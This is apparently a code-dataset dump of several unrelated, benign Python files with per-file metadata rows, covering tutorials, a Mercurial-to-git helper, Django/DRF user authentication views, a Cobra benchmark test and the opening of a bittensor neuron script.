"""
# Opaque sentinel used as the cookies-invalidated signal, following the
# Scrapy convention of plain object() instances for signal identity.
cookies_invalidated = object()
| 20.777778 | 77 | 0.780749 | 26 | 187 | 5.576923 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13369 | 187 | 8 | 78 | 23.375 | 0.895062 | 0.780749 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5e53846e2bb66fb7964f5329a489cc90405aafd | 881 | py | Python | Python/BasicTutorials/loops.py | ronkitay/Rons-Tutorials | c0459c57cc24b546847ec24afa94d2c1e5373bd4 | [
"MIT"
] | null | null | null | Python/BasicTutorials/loops.py | ronkitay/Rons-Tutorials | c0459c57cc24b546847ec24afa94d2c1e5373bd4 | [
"MIT"
] | null | null | null | Python/BasicTutorials/loops.py | ronkitay/Rons-Tutorials | c0459c57cc24b546847ec24afa94d2c1e5373bd4 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from rons_tutorial_formatting import *
print_block_separator()

# Block 1: while loop counting 1..9 (the trailing comma keeps the
# Python 2 print output on one line).
x = 1
while x < 10:
    print x,
    x += 1
end_block(True)

start_block()
# Block 2: if/elif/else branching inside a for loop over words.
words = ['hello', 'world', 'have', 'a', 'nice', 'day']
for word in words:
    if word.isalpha() and word[0] == 'h':
        print word,
    elif len(word) == 1:
        print word.upper(),
    else:
        shortened_word = word[:-1]
        print shortened_word.title(),
end_block(True)

start_block()
# Block 3: range() with start, stop and step arguments.
for value_in_range in range(12, 98, 3):
    print value_in_range, ',',
end_block(True)

start_block()
# Block 4: for/else — the else clause runs when the loop completes
# without hitting break (which it always does here, since j <= 9).
the_range = range(1, 10)
for j in the_range:
    if j > 9:
        print j
        break
else:
    print "The range `%s` does not contain anything greater than 9" % the_range
print

# Block 5: continue skips values below 500.
for j in range(0, 1000, 10):
    if j < 500:
        continue
    print j, ',',
end_block(True) | 16.622642 | 83 | 0.594779 | 134 | 881 | 3.761194 | 0.455224 | 0.063492 | 0.095238 | 0.10119 | 0.130952 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04321 | 0.264472 | 881 | 53 | 84 | 16.622642 | 0.734568 | 0.043133 | 0 | 0.25 | 0 | 0 | 0.095012 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.027778 | null | null | 0.277778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5e672aa538e6785d26c19832f02db4cd318b24e | 471 | py | Python | CSE-6239-assignment-1/code/sobel.py | shahidul56/computer-vision-resource | fd9f2a328e015bc0bf083578496e980681204614 | [
"MIT"
] | null | null | null | CSE-6239-assignment-1/code/sobel.py | shahidul56/computer-vision-resource | fd9f2a328e015bc0bf083578496e980681204614 | [
"MIT"
] | null | null | null | CSE-6239-assignment-1/code/sobel.py | shahidul56/computer-vision-resource | fd9f2a328e015bc0bf083578496e980681204614 | [
"MIT"
] | null | null | null | # Some imports
from matplotlib import pyplot as plt
import cv2
# for display
from skimage import data # for loading example data
from skimage.color import rgb2gray # for converting to grayscale
# Load image, convert to grayscale and show it
image = rgb2gray(data.astronaut())
def draw_image_histogram(image, channels, color='k'):
    """Plot a 256-bin intensity histogram of *image* for the given channels.

    :param image: input image array for cv2.calcHist
        (NOTE(review): cv2.calcHist expects uint8/float32 input — the
        module-level ``image`` above is a float64 skimage array; confirm
        the intended caller converts it first).
    :param channels: list of channel indices to histogram, e.g. [0].
    :param color: matplotlib line colour for the plot (default black).
    """
    hist = cv2.calcHist([image], channels, None, [256], [0, 256])
    plt.plot(hist, color=color)
    plt.xlim([0, 256])
| 29.4375 | 66 | 0.704883 | 67 | 471 | 4.925373 | 0.58209 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039578 | 0.195329 | 471 | 15 | 67 | 31.4 | 0.831135 | 0.259023 | 0 | 0 | 0 | 0 | 0.003049 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e5e752f6a18aedce35c0b66c9dcf5c5d4d5eb6e8 | 677 | py | Python | stack_reverse_string.py | kromagg/Python | 1ade4c3ac8f0ef24735c22437d3716cc7388f6a1 | [
"MIT"
] | null | null | null | stack_reverse_string.py | kromagg/Python | 1ade4c3ac8f0ef24735c22437d3716cc7388f6a1 | [
"MIT"
] | null | null | null | stack_reverse_string.py | kromagg/Python | 1ade4c3ac8f0ef24735c22437d3716cc7388f6a1 | [
"MIT"
] | null | null | null | class Stack:
class Stack:
    """LIFO stack backed by a Python list; the top is the end of the list."""

    def __init__(self):
        self.items = []

    def is_empty(self):
        """Return True when the stack holds no items."""
        return len(self.items) == 0

    def push(self, item):
        """Place *item* on top of the stack."""
        self.items.append(item)

    def pop(self):
        """Remove and return the top item."""
        return self.items.pop()

    def peek(self):
        """Return the top item without removing it."""
        return self.items[-1]

    def size(self):
        """Return the number of stacked items."""
        return len(self.items)

    def __str__(self):
        return str(self.items)
if __name__ == "__main__":
    # Demo: reverse a string by pushing every character and then popping
    # them back in LIFO order.
    string = ".koob doog a htiw nohtyP nraeL"
    reversed_string = ""
    s = Stack()
    for char in string:
        s.push(char)
    while not s.is_empty():
        reversed_string += s.pop()
print(reversed_string) | 18.297297 | 45 | 0.568685 | 89 | 677 | 4.089888 | 0.41573 | 0.197802 | 0.098901 | 0.093407 | 0.120879 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004283 | 0.310192 | 677 | 37 | 46 | 18.297297 | 0.775161 | 0.039882 | 0 | 0 | 0 | 0 | 0.058552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.291667 | false | 0 | 0 | 0.208333 | 0.541667 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
e5e7f6b3dfe5867d1dd051b77e4c526e95d5eaf6 | 5,100 | py | Python | hg2git.py | LukasPersonal/hg-fast-export | 77a770c2b856a49f0d58a035cd9e300c8c0203ac | [
"MIT"
] | null | null | null | hg2git.py | LukasPersonal/hg-fast-export | 77a770c2b856a49f0d58a035cd9e300c8c0203ac | [
"MIT"
] | 1 | 2021-09-30T17:11:13.000Z | 2021-09-30T17:11:13.000Z | hg2git.py | LukasPersonal/hg-fast-export | 77a770c2b856a49f0d58a035cd9e300c8c0203ac | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# pylint: disable=E1101.E0602
# Copyright (c) 2007, 2008 Rocco Rutte <pdmef@gmx.net> and others.
# License: MIT <http://www.opensource.org/licenses/mit-license.php>
import os
import re
import subprocess
import sys
from mercurial import error as hgerror
from mercurial import hg, templatefilters, ui
from mercurial.scmutil import binnode, revsymbol
# True when running under Python 2; used to shim Python-3-only names below.
PY2 = sys.version_info.major < 3
if PY2:
    # On Python 2, make ``str`` mean unicode text (Python-3 semantics).
    str = unicode  # noqa: F821
    # Python 2 has no os.fsencode; emulate it with the filesystem encoding.
    fsencode = lambda s: s.encode(sys.getfilesystemencoding())  # noqa: E731
else:
    from os import fsencode
# default git branch name: the git branch Mercurial's unnamed/'default'
# branch is exported to (overridable via set_default_branch()).
cfg_master = b"master"
# default origin name: optional remote prefix for exported branch names
# (overridable via set_origin_name()).
origin_name = b""
# silly regex to see if user field has email address — matches a user
# already in 'Name <email>' form; group 1 = name, group 2 = <email>.
user_re = re.compile(b"([^<]+) (<[^>]*>)$")
# silly regex to clean out user names — matches a name wrapped in double
# quotes so the quotes can be stripped.
user_clean_re = re.compile(b'^["]([^"]+)["]$')
def set_default_branch(name):
    """Set the git branch used for hg's 'default' branch (stored as bytes)."""
    global cfg_master
    if isinstance(name, bytes):
        cfg_master = name
    else:
        cfg_master = name.encode("utf8")
def set_origin_name(name):
    """Set the remote-name prefix (e.g. b"origin") applied by get_branch()."""
    global origin_name
    origin_name = name
def setup_repo(url):
    """Open the Mercurial repository at *url*; return (ui, unfiltered repo)."""
    # Some Mercurial versions reject ``interactive`` as a ui() keyword
    # (TypeError); fall back to configuring it via setconfig.
    try:
        myui = ui.ui(interactive=False)
    except TypeError:
        myui = ui.ui()
        myui.setconfig(b"ui", b"interactive", b"off")
    # Avoids a warning when the repository has obsolete markers
    myui.setconfig(b"experimental", b"evolution.createmarkers", True)
    return myui, hg.repository(myui, fsencode(url)).unfiltered()
def fixup_user(user, authors):
    """Normalise a Mercurial author field into git's ``Name <email>`` form.

    *user* is the raw bytes author string from a changeset; *authors* is an
    optional author-remapping table (pass ``None`` to skip the lookup).
    Returns bytes of the form ``b"Name <mail>"``.
    """
    user = user.strip(b'"')
    if authors is not None:
        # if we have an authors table, try to get mapping
        # by defaulting to the current value of 'user'
        user = authors.get(user, user)
    name, mail, m = b"", b"", user_re.match(user)
    if m is None:
        # if we don't have 'Name <mail>' syntax, extract name
        # and mail from hg helpers. this seems to work pretty well.
        # if email doesn't contain @, replace it with devnull@localhost
        name = templatefilters.person(user)
        mail = b"<%s>" % templatefilters.email(user)
        if b"@" not in mail:
            mail = b"<devnull@localhost>"
    else:
        # if we have 'Name <mail>' syntax, everything is fine :)
        name, mail = m.group(1), m.group(2)
    # remove any silly quoting from username
    m2 = user_clean_re.match(name)
    if m2 is not None:
        name = m2.group(1)
    return b"%s %s" % (name, mail)
def get_branch(name):
    """Map a Mercurial branch name to the git branch name to emit.

    'HEAD' is the result of a bug in mutt's cvs->hg conversion; other CVS
    imports may need the same aliasing.  'HEAD', 'default' and the empty
    name all map to the configured master branch, optionally prefixed with
    the origin name.
    """
    if name in (b"HEAD", b"default", b""):
        name = cfg_master
    return origin_name + b"/" + name if origin_name else name
def get_changeset(ui, repo, revision, authors=None, encoding=""):
    """Read one changeset from *repo* and return its normalised fields.

    Returns ``(node, manifest, user, (time, tz), files, desc, branch,
    extra)`` where *user* has been passed through :func:`fixup_user` and
    *tz* is a git-style signed ``HHMM`` offset bytes string.

    *authors* is an optional author-remapping table; the default was
    changed from a mutable ``{}`` (a shared-default bug pattern) to
    ``None``, which :func:`fixup_user` treats as "no table" — behaviour
    for callers relying on the default is unchanged.  *encoding*, when
    non-empty, re-encodes user/description from that charset to UTF-8.
    """
    # Starting with Mercurial 4.6 lookup no longer accepts raw hashes
    # for lookups. Work around it by changing our behaviour depending on
    # how it fails.
    try:
        node = repo.lookup(revision)
    except (TypeError, hgerror.ProgrammingError):
        node = binnode(revsymbol(repo, b"%d" % revision))  # We were given a numeric rev
    except hgerror.RepoLookupError:
        node = revision  # We got a raw hash
    (manifest, user, (time, timezone), files, desc, extra) = repo.changelog.read(node)
    if encoding:
        user = user.decode(encoding).encode("utf8")
        desc = desc.decode(encoding).encode("utf8")
    # Mercurial stores the offset west of UTC in seconds; git wants a
    # signed +/-HHMM string east of UTC, hence the negations.
    tz = b"%+03d%02d" % (-timezone // 3600, ((-timezone % 3600) // 60))
    branch = get_branch(extra.get(b"branch", b"master"))
    return (
        node,
        manifest,
        fixup_user(user, authors),
        (time, tz),
        files,
        desc,
        branch,
        extra,
    )
def mangle_key(key):
    """Identity key transform; default *get_key* for :func:`load_cache`."""
    return key


def load_cache(filename, get_key=mangle_key):
    """Load a ``:key value`` cache file into a dict.

    Each valid line looks like ``:<key> <value>\\n``.  Malformed lines are
    reported on stderr and skipped.  Returns an empty dict when the file
    does not exist.  *get_key* lets callers transform keys on load.
    """
    cache = {}
    if not os.path.exists(filename):
        return cache
    # "with" guarantees the handle is closed even on an unexpected error
    # (the original leaked it if anything raised mid-loop).
    with open(filename, "rb") as f:
        for linecount, line in enumerate(f, start=1):
            fields = line.split(b" ")
            # A valid entry has exactly two fields and starts with ':'.
            # (bytes.split never returns None, so that check was dead code.)
            if len(fields) != 2 or fields[0][0:1] != b":":
                sys.stderr.write(
                    "Invalid file format in [%s], line %d\n" % (filename, linecount)
                )
                continue
            # put key:value in cache, key without the leading ':';
            # strip the trailing newline from the value.
            cache[get_key(fields[0][1:])] = fields[1].split(b"\n")[0]
    return cache
def save_cache(filename, cache):
    """Write *cache* to *filename* in the ``:key value`` line format
    understood by :func:`load_cache`.

    Keys and values that are not already bytes are stringified and UTF-8
    encoded.  Uses a context manager so the handle is closed (and buffers
    flushed) even if a write fails — the original leaked it on error.
    """
    with open(filename, "wb") as f:
        for key, value in cache.items():
            if not isinstance(key, bytes):
                key = str(key).encode("utf8")
            if not isinstance(value, bytes):
                value = str(value).encode("utf8")
            f.write(b":%s %s\n" % (key, value))
def get_git_sha1(name, type="heads"):
    """Resolve ref ``refs/<type>/<name>`` to a git SHA-1, or ``None``.

    *name* is a bytes ref name.  Uses ``git rev-parse`` so packed refs are
    handled too; returns the first 40 bytes of the command's output.
    """
    # use git-rev-parse to support packed refs
    ref = "refs/%s/%s" % (type, name.decode("utf8"))
    try:
        output = subprocess.check_output(
            ["git", "rev-parse", "--verify", "--quiet", ref.encode("utf8")]
        )
    except subprocess.CalledProcessError:
        return None
    if not output:
        return None
    return output[0:40]
| 30.909091 | 88 | 0.612941 | 708 | 5,100 | 4.365819 | 0.372881 | 0.022646 | 0.011647 | 0.012941 | 0.016176 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018533 | 0.259412 | 5,100 | 164 | 89 | 31.097561 | 0.799841 | 0.218627 | 0 | 0.095652 | 0 | 0 | 0.07049 | 0.005811 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.069565 | 0.008696 | 0.252174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e873bb87ab31b611a9db0a4399b14d3a1da37d | 331 | py | Python | l1-l100/7.py | ZucchiniY/Leetcode-cn | c26d080b7f8115a2edfc135742c1cad0105eccfc | [
"MIT"
] | null | null | null | l1-l100/7.py | ZucchiniY/Leetcode-cn | c26d080b7f8115a2edfc135742c1cad0105eccfc | [
"MIT"
] | null | null | null | l1-l100/7.py | ZucchiniY/Leetcode-cn | c26d080b7f8115a2edfc135742c1cad0105eccfc | [
"MIT"
] | null | null | null | """
最终的结果要考虑 Python 的int 类型会比一般语言的长,所以要考虑 32位这个范围。
"""
class Solution:
    """LeetCode 7: reverse the decimal digits of a 32-bit signed integer."""

    def reverse(self, x: int) -> int:
        """Return *x* with its digits reversed, or 0 on 32-bit overflow."""
        sign = -1 if x < 0 else 1
        reversed_digits = int(str(abs(x))[::-1])
        result = sign * reversed_digits
        # Python ints are unbounded, so the 32-bit range must be enforced
        # explicitly (bounds exclusive, matching the original check).
        if -2147483648 < result < 2147483647:
            return result
        return 0
| 18.388889 | 55 | 0.432024 | 45 | 331 | 3.177778 | 0.511111 | 0.083916 | 0.055944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149733 | 0.435045 | 331 | 17 | 56 | 19.470588 | 0.614973 | 0.138973 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e8dd52ec7800abc2fea2d0e906bb4110812873 | 382 | py | Python | users/urls.py | Gabriel-limadev/learning_log | c8f0d0e95d19da652c7a56d80df0990d5c3a18d0 | [
"MIT"
] | null | null | null | users/urls.py | Gabriel-limadev/learning_log | c8f0d0e95d19da652c7a56d80df0990d5c3a18d0 | [
"MIT"
] | null | null | null | users/urls.py | Gabriel-limadev/learning_log | c8f0d0e95d19da652c7a56d80df0990d5c3a18d0 | [
"MIT"
] | null | null | null | """Define padrões de URL para users"""
from django.urls import path, include
from django.contrib.auth.views import LoginView
from . import views
urlpatterns = [
# Página de Login
path('login', LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout', views.logout_view, name='logout'),
path('register', views.register, name='register')
]
| 27.285714 | 85 | 0.712042 | 51 | 382 | 5.27451 | 0.509804 | 0.074349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143979 | 382 | 13 | 86 | 29.384615 | 0.82263 | 0.128272 | 0 | 0 | 0 | 0 | 0.165138 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e5ebdbe01f05c949fa7304e210592a5bcd39cded | 5,923 | py | Python | resumecollection/users/v1/views.py | m-ali-ubit/resume-collection | 1e598928fed38f4a3b5972ff473e26e07e4c464a | [
"MIT"
] | null | null | null | resumecollection/users/v1/views.py | m-ali-ubit/resume-collection | 1e598928fed38f4a3b5972ff473e26e07e4c464a | [
"MIT"
] | null | null | null | resumecollection/users/v1/views.py | m-ali-ubit/resume-collection | 1e598928fed38f4a3b5972ff473e26e07e4c464a | [
"MIT"
] | null | null | null | import logging
from django.contrib.auth import get_user_model, authenticate
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404
from django.views.generic import RedirectView
from rest_framework import status, permissions
from rest_framework.exceptions import ValidationError
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from resumecollection.users.helpers import UpdatePasswordHelper
from resumecollection.users.v1.serializers import (
UserSerializer,
ForgotPasswordEmailSerializer,
UpdatePasswordRequestSerializer,
LoginRequestSerializer,
)
from resumecollection.utils.authentication import create_login_token
from resumecollection.utils.email import send_password_update_email
from resumecollection.utils.permissions import UpdatePasswordPermission
from resumecollection.utils.response_handler import validation_exception_handler
logger = logging.getLogger(__name__)
User = get_user_model()
class UserModelViewSet(ModelViewSet):
    """CRUD API for User objects, addressed by username instead of pk."""

    serializer_class = UserSerializer
    queryset = User.objects.all()
    # URLs look up users by username rather than the numeric primary key.
    lookup_field = "username"
class UserRedirectView(LoginRequiredMixin, RedirectView):
    """Redirect an authenticated user to their own detail page."""

    def get_redirect_url(self):
        # Build the detail URL from the requesting user's username.
        return reverse("users:detail", kwargs={"username": self.request.user.username})
class ForgotPasswordAPIView(APIView):
    """Send a password-reset email for the address given in query params."""

    def validate_email(self, query_params):
        """Validate the ``email`` query parameter and return its value.

        Raises DRF ``ValidationError`` on bad input (raise_exception=True).
        """
        serializer = ForgotPasswordEmailSerializer(data=query_params)
        serializer.is_valid(raise_exception=True)
        return serializer.validated_data.get("email")

    def get(self, request) -> Response:
        try:
            user_email_address = self.validate_email(request.query_params)
            user = get_object_or_404(User, email=user_email_address)
            # Email the user a generated URL where the password can be updated.
            send_password_update_email(
                user, UpdatePasswordHelper.generate_update_password_url(user)
            )
        except Http404:
            # get_object_or_404 failed: no account for that address.
            logger.error(
                f"Failure to find the object, the User with the email "
                f"{user_email_address} doesnt exist"
            )
            return Response(
                data=f"The User with the email {user_email_address} doesnt exist.",
                status=status.HTTP_400_BAD_REQUEST,
            )
        except ValidationError as validation_error:
            logger.error(
                f"Validation error occurred while sending forget password email. "
                f"Error: {validation_error}"
            )
            return Response(
                data="The email address is not valid",
                status=status.HTTP_400_BAD_REQUEST,
            )
        logger.info(
            f"Email for updating password has been sent to {user_email_address}"
        )
        return Response(
            data="Email has been sent successfully", status=status.HTTP_200_OK
        )
class UpdateUserPasswordAPIView(APIView):
    """Update a user's password via a token-authorised (or admin) request."""

    permission_classes = [UpdatePasswordPermission]

    def get_permissions(self):
        # Admin-initiated updates only require an authenticated session;
        # all other requests must satisfy the update-password token check.
        if self.request.data.get("is_admin"):
            return [permissions.IsAuthenticated()]
        return super(UpdateUserPasswordAPIView, self).get_permissions()

    def post(self, request) -> Response:
        try:
            serialized_data = UpdatePasswordRequestSerializer(data=request.data)
            serialized_data.is_valid(raise_exception=True)
            user = get_object_or_404(User, email=request.data.get("email"))
            user.set_password(serialized_data.data["confirm_password"])
            user.save()
            # One-shot token: invalidate it so the reset link cannot be reused.
            UpdatePasswordHelper.invalidate_update_password_token(user.email)
            return Response(
                data="Password has been updated successfully", status=status.HTTP_200_OK
            )
        except Http404:
            logger.error(f"Failure to find the object, user with email doesnt exist")
            return Response(
                data="The User doesn't exist", status=status.HTTP_400_BAD_REQUEST
            )
        except ValidationError as validation_error:
            logger.error(
                f"Validation error occurred while updating the password with {validation_error}"
            )
            return Response(
                data=f"Failed to update the password with {validation_error}",
                status=status.HTTP_400_BAD_REQUEST,
            )
class LoginUserAPIView(APIView):
    """Authenticate a user and return a login token plus serialized user."""

    permission_classes = [permissions.AllowAny]

    def post(self, request):
        try:
            request_serializer = LoginRequestSerializer(data=request.data)
            request_serializer.is_valid(raise_exception=True)
            username = request_serializer.validated_data["username"]
            password = request_serializer.validated_data["password"]
            remember_me = request_serializer.validated_data["remember_me"]
            # Username is lower-cased before auth — presumably usernames are
            # stored lower-case; verify against the registration flow.
            user = authenticate(username=username.lower(), password=password)
            if not user:
                return Response(
                    data="Credentials not correct. Unable to Login.",
                    status=status.HTTP_401_UNAUTHORIZED,
                )
            token = create_login_token(user, remember_me)
            return Response(
                data={
                    "token": token,
                    "user": UserSerializer(user).data,
                    "message": "Successfully logged in.",
                },
                status=status.HTTP_200_OK,
            )
        except ValidationError as error:
            logger.info(
                f"Validation failed for User Login with exception {error}"
            )
            data = validation_exception_handler(error)
            # NOTE(review): uses the exception class's generic message
            # (``default_detail``), not the per-field detail — confirm intended.
            data.update({"message": error.default_detail})
            return Response(data=data, status=status.HTTP_400_BAD_REQUEST)
| 39.225166 | 96 | 0.667905 | 608 | 5,923 | 6.307566 | 0.241776 | 0.032855 | 0.042243 | 0.024772 | 0.232595 | 0.16219 | 0.097001 | 0.08292 | 0.08292 | 0.08292 | 0 | 0.010538 | 0.263042 | 5,923 | 150 | 97 | 39.486667 | 0.868041 | 0 | 0 | 0.178295 | 0 | 0 | 0.140976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046512 | false | 0.170543 | 0.139535 | 0.007752 | 0.364341 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5ede57f6e5a4c4f286e2ced6355288e52909591 | 1,947 | py | Python | binding/python/test_cobra_perf.py | Picovoice/cobra | 2684f7e873930b66fa5cd114ee06434a63760160 | [
"Apache-2.0"
] | 26 | 2021-09-17T20:11:52.000Z | 2022-03-13T01:33:22.000Z | binding/python/test_cobra_perf.py | Picovoice/cobra | 2684f7e873930b66fa5cd114ee06434a63760160 | [
"Apache-2.0"
] | 4 | 2021-09-29T20:39:25.000Z | 2022-01-19T18:24:56.000Z | binding/python/test_cobra_perf.py | Picovoice/cobra | 2684f7e873930b66fa5cd114ee06434a63760160 | [
"Apache-2.0"
] | 3 | 2021-11-08T05:19:24.000Z | 2022-03-07T03:08:24.000Z | #
# Copyright 2022 Picovoice Inc.
#
# You may not use this file except in compliance with the license. A copy of the license is located in the "LICENSE"
# file accompanying this source.
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
import sys
import time
import unittest
from cobra import Cobra
from util import *
from test_util import *
class CobraPerformanceTestCase(unittest.TestCase):
    """Benchmark Cobra audio processing against a wall-clock budget.

    NOTE: the class attributes are read from ``sys.argv`` at import time,
    so the script must be invoked with exactly three positional arguments
    (access key, iteration count, threshold in seconds).
    """

    ACCESS_KEY = sys.argv[1]                        # Picovoice access key
    NUM_TEST_ITERATIONS = int(sys.argv[2])          # benchmark repetitions
    PERFORMANCE_THRESHOLD_SEC = float(sys.argv[3])  # max allowed average seconds

    def test_performance(self):
        cobra = Cobra(access_key=sys.argv[1], library_path=pv_library_path('../..'))
        audio = read_wav_file(
            os.path.join(os.path.dirname(__file__), '../../res/audio/sample.wav'),
            cobra.sample_rate)
        num_frames = len(audio) // cobra.frame_length
        perf_results = []
        for i in range(self.NUM_TEST_ITERATIONS):
            proc_time = 0
            for j in range(num_frames):
                # Time only the process() call, not the frame slicing.
                frame = audio[j * cobra.frame_length:(j + 1) * cobra.frame_length]
                start = time.time()
                cobra.process(frame)
                proc_time += time.time() - start
            # The first iteration is treated as warm-up and excluded.
            if i > 0:
                perf_results.append(proc_time)
        cobra.delete()
        # NOTE(review): divides by NUM_TEST_ITERATIONS although only
        # NUM_TEST_ITERATIONS - 1 samples were kept — confirm intended.
        avg_perf = sum(perf_results) / self.NUM_TEST_ITERATIONS
        print("Average performance: %s" % avg_perf)
        self.assertLess(avg_perf, self.PERFORMANCE_THRESHOLD_SEC)
if __name__ == '__main__':
    # Require the three positional CLI arguments documented on the class.
    if len(sys.argv) != 4:
        print("usage: test_cobra_perf.py ${ACCESS_KEY} ${NUM_TEST_INTERVALS} ${PERFORMANCE_THRESHOLD_SEC}")
        exit(1)
    # Strip our custom arguments so unittest does not try to parse them.
    unittest.main(argv=sys.argv[:1])
| 33 | 117 | 0.663585 | 262 | 1,947 | 4.729008 | 0.465649 | 0.048426 | 0.01937 | 0.025827 | 0.027441 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009434 | 0.237802 | 1,947 | 58 | 118 | 33.568966 | 0.825472 | 0.247047 | 0 | 0 | 0 | 0 | 0.104467 | 0.051546 | 0 | 0 | 0 | 0 | 0.028571 | 1 | 0.028571 | false | 0 | 0.171429 | 0 | 0.314286 | 0.057143 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5edfa705d3471d7a0761238dd4b5b4398bf2f00 | 4,034 | py | Python | neurons/boltzmann/main.py | unconst/SimpleWord2Vec | d1af6993c1d6bca273a0c8d147132ee9867f5543 | [
"MIT"
] | 9 | 2019-12-18T10:20:15.000Z | 2021-03-18T00:07:28.000Z | neurons/boltzmann/main.py | unconst/SimpleWord2Vec | d1af6993c1d6bca273a0c8d147132ee9867f5543 | [
"MIT"
] | 5 | 2020-02-12T02:21:15.000Z | 2022-02-10T00:25:28.000Z | neurons/boltzmann/main.py | unconst/BitTensor | d1af6993c1d6bca273a0c8d147132ee9867f5543 | [
"MIT"
] | null | null | null | import bittensor
from config import Config
from metagraph import Metagraph
from dendrite import Dendrite
from nucleus import Nucleus
from neuron import Neuron
from Crypto.Hash import SHA256
from datetime import timedelta
import grpc
from loguru import logger
import pickle
import numpy as np
import random
import time
from timeloop import Timeloop
def set_timed_loops(tl, config, neuron, metagraph):
    """Register the neuron's periodic jobs on the *tl* Timeloop instance.

    Jobs run on fixed intervals once ``tl.start()`` is called:
      * pull the updated graph state (vertices, edges, weights) every 7 s,
      * reselect peer channels every 10 s,
      * apply a gradient step every 3 s.

    *config* is accepted for interface compatibility but is unused here.
    (A large block of commented-out gRPC self-test code was removed; see
    version-control history if it is ever needed again.)
    """

    # Pull the updated graph state (Vertices, Edges, Weights).
    @tl.job(interval=timedelta(seconds=7))
    def pull_metagraph():
        metagraph.pull_metagraph()

    # Reselect channels.
    @tl.job(interval=timedelta(seconds=10))
    def connect():
        neuron.connect()

    # Apply a gradient step.
    @tl.job(interval=timedelta(seconds=3))
    def learn():
        neuron.Learn()
def main():
    """Wire up the neuron's components, serve it, and block until interrupted."""
    config = Config()
    metagraph = Metagraph(config)
    dendrite = Dendrite(config, metagraph)
    nucleus = Nucleus(config)
